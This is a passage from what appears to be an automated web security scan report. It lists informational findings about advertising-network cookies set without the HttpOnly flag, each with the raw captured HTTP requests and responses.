User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; Li=1=734247&30=734245; Aqprep_Banner728X90=152290=634388251382156836:51780&160825=634389890253630409:51825&150572=634389917073398373:51825; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260&10654=734265

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ucap=sl=1; domain=.a1.interclick.com; expires=Thu, 19-May-2011 15:38:17 GMT; path=/
Set-Cookie: FC_51=128531=17622395:1; domain=.a1.interclick.com; expires=Tue, 10-May-2011 15:38:17 GMT; path=/
Set-Cookie: IFC=n=1&w50020=1&a128531=1&e=634406242976940565; domain=.a1.interclick.com; expires=Tue, 10-May-2011 15:38:17 GMT; path=/
Set-Cookie: Aqprep_Banner300X250=128531=634405378976970568:50020; domain=.a1.interclick.com; expires=Sun, 07-Aug-2011 15:38:17 GMT; path=/
Set-Cookie: Li=1=734265&30=734245; domain=.a1.interclick.com; expires=Wed, 08-Jun-2011 15:38:17 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:38:17 GMT
Content-Length: 836

document.write(unescape("%3CSCRIPT%20language%3D%27JavaScript1.1%27%20SRC%3D%22http%3A//ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.15%3Bsz%3D300x250%3Bclick%3Dhttp%3A//a1.interclick.com/i
...[SNIP]...

11.14. http://ad.amgdgt.com/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=88105499721132220&clkurl=http://ib.adnxs.com/click/mpmZmZmZ-T-amZmZmZn5PwAAAAAAAAxAAAAAAAAADEAAAAAAAAAMQODGbwg69CFkSsYda6b2ziWrCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04AEA8BAgUCAAQAAAAAfxzeJwAAAAA./cnd=!eRMkCwj25QIQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU./referrer=http%3A%2F%2Fwww.csmonitor.com%2FBusiness/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBAFOqqwnITbTYJoX0lAf-jfHKCdfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHD8v3sA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc5gCwAzAAgTIAoXSzwrgAgDqAhAzMDB4MjUwQ19HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtygYYY1WjNaewxmNUetXvrYk6kjZg%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUaGIdSlqXB8gTNDuT_OL7eWkwL7QDA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv0j_xZYQeVagXI_gHKuMLlNHp0ZuPRtvBk3GSrXAtT3E6jPDaZvo_lNE5z6zNP1cctJMDAwdS4BurMZaOYvoJnuMDMn6Uf4Q.Uw3NnLsc0bKofhll4Ol35cch3ZMadwyiW5XccpF.F1Daec34QQnHKuDRxQOYx46JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgETDcGXHKV3YLAeUZfI_rNYBSUeAtRkFGYHraycgPpBgMeJgZWZnZ.NkZORg5GbkYuRl5GHkZ.cCSLJmMIkA1SwvAOhTMIIIhTCKMokBh.V1cbMzYtC12ZwQ6B5hcL7nWCoCsZmAAAFGskws-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUVGIL2vn32CiWPiwQj5OTzmIjggADA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqR9VoXJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJBgYmDqXAP3QDDTzF9BMd5iZk_Qj_KFyGP7r5djmDZXDcEsvh0s_LrmO7JhTOOWS3K7jlIvwuoZTzm9CCE451wYOqBxGPHRIuN_GqU_CThuXvvaTOzfh0td.ckYtTrkTwouBYcuIU76yWwgoz.B7XK8BlIoCbzEKMgLT005GfiDFYMDHwMjMyMLEys_GyM7IwcjJyMXIzcjDyMvIB1bAkskoAlS3tACsS8EMIhjCJMIoChSW38XNyoRd42J3RqCjYIkW5AIGAPYfk5A-; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 15:35:18 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3928
Date: Mon, 09 May 2011 15:35:17 GMT

_289669_amg_acamp_id=172249;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...

11.15. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;231082307;55315497;e?http://www.groupon.com/subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://share.meebo.com/cim/whitev4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.groupon.com/subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1
Set-Cookie: id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 09 May 2011 15:35:33 GMT
Server: GFE/2.0
Content-Type: text/html


11.16. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1114604&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~"; bh="b!!!%.!!!?H!!!!%<wR0_!!*oY!!!!*<yqWL!!-?2!!!!0<yqWL!!-G2!!!!$<w[UB!!-O3!!!!$<yqWL!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!+<yqWL!!0O4!!!!*<ypn@!!0O<!!!!1<ypn@!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!0<ypn@!!J<E!!!!0<ypn@!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!+<yqWL!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!)<yqWL!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!1<ypn@!!q:E!!!!.<ypn@!!q<+!!!!/<ypn@!!q</!!!!/<ypn@!!q<3!!!!/<ypn@!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#<ypn@!!tjQ!!!!+<yqWL!!ucq!!!!1<ypn@!!vRm!!!!*<ypn@!!vRq!!!!*<ypn@!!vRr!!!!*<ypn@!!vRw!!!!1<ypn@!!vRx!!!!*<ypn@!!vRy!!!!*<ypn@!!w3l!!!!+<yqWL!!wQ3!!!!+<yqWL!!wQ5!!!!+<yqWL!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!*<ypn@!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!)<yqWL!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!*<ypnB!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!*<ypn@!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!*<ypn@!#7.'!!!!*<ypn@!#7.:!!!!*<ypn@!#7.O!!!!*<ypn@!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!*<ypn@!#MTF!!!!*<ypn@!#MTH!!!!*<ypn@!#MTI!!!!*<ypn@!#MTJ!!!!*<ypn@!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N45!!!!#<xr]M!#O29!!!!)<yqWL!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!0<ypn@!#SF3!!!!0<ypn@!#T,d!!
!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!*<ypn@!#UDP!!!!0<ypn@!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!)<yqWL!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!)<yqWL!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!)<yqWL!#`S2!!!!+<yqWL!#`U0!!!!*<yqWL!#`U9!!!!)<yqWL!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!*<yqWL!#a=7!!!!*<yqWL!#a=9!!!!*<yqWL!#a=P!!!!*<yqWL!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!*<ypn@!#ai7!!!!*<ypn@!#ai?!!!!*<ypn@!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!)<yqWL!#c8W!!!!)<yqWL!#c8X!!!!)<yqWL!#c8]!!!!)<yqWL!#c?c!!!!*<ypn@!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!#<yqWL!#e9?!!!!#<y,`,!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!)<yqWL!#fG+!!!!*<yqWL!#g=!!!!!)<yqWL!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!)<yqWL!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!*<ypn@!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!*<ypn@!#tM)!!!!*<ypn@!#tn2!!!!*<ypn@!#uE=!!!!#<x9#K!#uJY!!!!0<ypn@!#uR3!!!!)<yqWL!#ujQ!!!!)<yqWL!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!*<ypn@!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!#<yq29!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!-<ypn@!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!(<yqWL!$#R7!!!!*<ypn@!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<w
Uv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!*<ypn@!$(!P!!!!+<yqWL!$(+N!!!!#<wGkB!$(Gt!!!!-<ypn@!$(S9!!!!)<yqWL!$(Tb!!!!#<yQLc!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!+<yqWL!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!)<yqWL"; ih="b!!!!A!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!024(!!!!#<ypn>!0242!!!!#<ypnV!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; vuday1=%)0sH[[@+$qtDL:!1e0gra^fk; BX=8khj7j56qmjsh&b=4&s=dk&t=106; lifb=C7NV=W,ZP69,/lZve[$G>MqpcO*GC#5JO?Y

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:35:41 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%/!!!?H!!!!%<wR0_!!*oY!!!!*<yqWL!!-?2!!!!0<yqWL!!-G2!!!!$<w[UB!!-O3!!!!$<yqWL!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!+<yqWL!!0O4!!!!*<ypn@!!0O<!!!!1<ypn@!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!0<ypn@!!J<E!!!!0<ypn@!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!+<yqWL!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!)<yqWL!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!1<ypn@!!q:E!!!!.<ypn@!!q<+!!!!/<ypn@!!q</!!!!/<ypn@!!q<3!!!!/<ypn@!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#<ypn@!!tjQ!!!!+<yqWL!!ucq!!!!1<ypn@!!vRm!!!!*<ypn@!!vRq!!!!*<ypn@!!vRr!!!!*<ypn@!!vRw!!!!1<ypn@!!vRx!!!!*<ypn@!!vRy!!!!*<ypn@!!w3l!!!!+<yqWL!!wQ3!!!!+<yqWL!!wQ5!!!!+<yqWL!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!*<ypn@!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!)<yqWL!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!*<ypnB!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!*<ypn@!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!*<ypn@!#7.'!!!!*<ypn@!#7.:!!!!*<ypn@!#7.O!!!!*<ypn@!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!*<ypn@!#MTF!!!!*<ypn@!#MTH!!!!*<ypn@!#MTI!!!!*<ypn@!#MTJ!!!!*<ypn@!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N45!!!!#<xr]M!#O29!!!!)<yqWL!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!0<ypn@!#SF3!!!!0<ypn@!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!*<ypn@!#UDP!!!!0<ypn@!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!)<yqWL!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!)<yq
WL!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!)<yqWL!#`S2!!!!+<yqWL!#`U0!!!!*<yqWL!#`U9!!!!)<yqWL!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!*<yqWL!#a=7!!!!*<yqWL!#a=9!!!!*<yqWL!#a=P!!!!*<yqWL!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!*<ypn@!#ai7!!!!*<ypn@!#ai?!!!!*<ypn@!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!)<yqWL!#c8W!!!!)<yqWL!#c8X!!!!)<yqWL!#c8]!!!!)<yqWL!#c?c!!!!*<ypn@!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!#<yqWL!#e9?!!!!#<y,`,!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!)<yqWL!#fG+!!!!*<yqWL!#g=!!!!!)<yqWL!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq[g!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!)<yqWL!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!*<ypn@!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!*<ypn@!#tM)!!!!*<ypn@!#tn2!!!!*<ypn@!#uE=!!!!#<x9#K!#uJY!!!!0<ypn@!#uR3!!!!)<yqWL!#ujQ!!!!)<yqWL!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!*<ypn@!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!#<yq29!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!-<ypn@!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!(<yqWL!$#R7!!!!*<ypn@!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!*<ypn@!$(!P!!!!+<yqWL!$(+N!!!!#<wGkB!$(Gt!!!!-<ypn@!$(S9!!!!)<yqWL!$(Tb!!!!#<yQLc!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!+<yqWL!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*
bX!!!!#<xr]Q!$*hf!!!!)<yqWL"; path=/; expires=Wed, 08-May-2013 15:35:41 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=9,/lZve[$G>MqpcO*GC#CYO/u; path=/; expires=Mon, 09-May-2011 22:00:30 GMT
Location: http://www.googleadservices.com/pagead/conversion/1034849195/?label=8_QLCI2F-gIQq5e67QM&amp;guid=ON&amp;script=0
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 15:35:41 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close


11.17. http://ads.bridgetrack.com/a/f/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/f/?BT_CON=200&BT_PID=1559799&r=1748565961&click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA%26num%3D1%26sig%3DAGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ%26client%3Dca-pub-8560941387472259%26adurl%3D HTTP/1.1
Host: ads.bridgetrack.com
